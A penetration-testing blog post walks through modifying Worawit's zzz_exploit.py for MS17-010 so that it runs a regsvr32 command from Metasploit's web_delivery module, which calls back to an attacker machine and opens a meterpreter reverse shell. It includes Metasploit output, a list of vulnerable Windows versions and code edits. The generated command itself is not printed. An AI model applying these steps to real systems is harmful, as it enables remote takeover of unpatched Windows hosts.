MS17-010: Python



Background

MS17-010 is an exploit, supposedly, developed by the NSA. It is an attack against the SMBv1 protocol and was leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found here.

This exploit is commonly found on internal penetration tests and can often lead to SYSTEM level access via Remote Code Execution. Through Metasploit, there are several readily available modules for this:

                        
msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
 
 

With this abundance of modules, there still isn't a consistent module for hitting x86 or obscure version builds. The common complaint from Metasploit is that the target does not match the required arch or build. This can be fixed with the customised Worawit's python script.

For the purpose of testing this set up, it was done on a x64 bit Data Centre build that I KNOW is vulnerable to MS17-010, further development will be put into ensuring that this does infact work on x86. With that said, zzz_exploit.py does however state that it has been tested on all of the following versions:

                        
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The note worthy ones are checker.py and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010 and should allow for the exploitation of the previously mentioned Windows variants.

All credit goes to Korey Mckinley and his article, small adjustments were made to this to suit my current set up.

Metasploit

A new technique was introduced to me from Korey, it was the use of regsvr32 to call back to the attacker machine and download a file to create a reverse shell. The module for this is called web_delivery.

This is easy enough to configure. In Metasploit, use the exploit/multi/script/web_delivery module and configure the options accordingly.

This module has multiple methods for calling back to the attacker machine. However, this post will stick to regsvr32.

My Metasploit configuration looked like this:

Ensure that set target 3 is set if using regsvr32. What this module is doing is using the target method (regsvr32) to call back to the attackers machine and download the payload specified. In this case, windows/x64/meterpreter/reverse_tcp is being used.

Once this module is ran, it will generate a command that can be ran on a target machine and create the callback. For testing, it might be worth manually copying and pasting this command into your test VM and watch Metasploit to ensure that the regsvr32 command is working. Once this is done, and youre happy that it is working; this command needs to be added to zzz_exploit.py.

The command created:


zzz_exploit.py

Clone Worawit's GitHub. Make any permission changes and open up zzz_exploit.py. Line 972 is the creation of the smb_pwn function.

The first few lines of this function will create a pwned.txt on the C:\. This isnt required, so comment out the following:

                        
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)

Underneath that, there will be an example use of service_exec function. Uncomment this and switch out the payload for the payload generated by web_delivery. The function should now look similar to this:

The function has now been updated to contain the regsvr32 command. Execute the script against the specified host with python zzz_exploit.py 192.168.0.35.

Once executed, you should see something similar to this:

The module shows regsvr32 calling back and collecting the payload and the meterpreter session being created.

And thats how you use regsvr32 as a means to create a reverse shell from a MS17-010 python script. The purpose of this is to allow further research into exploiting more obscure versions of Windows and that is exactly what will happen in the near future for myself. I am fairly certain this will work on x86 machines, but I will create another post confirming or denying this.

My modified fork can be found here.

References

Worawit: Twitter

Worawit: GitHub

Korey McKinley: Manually Exploiting MS17-010

Regsvr32 Microsoft Documents

Checkpoint Research: MS17-010 Analysis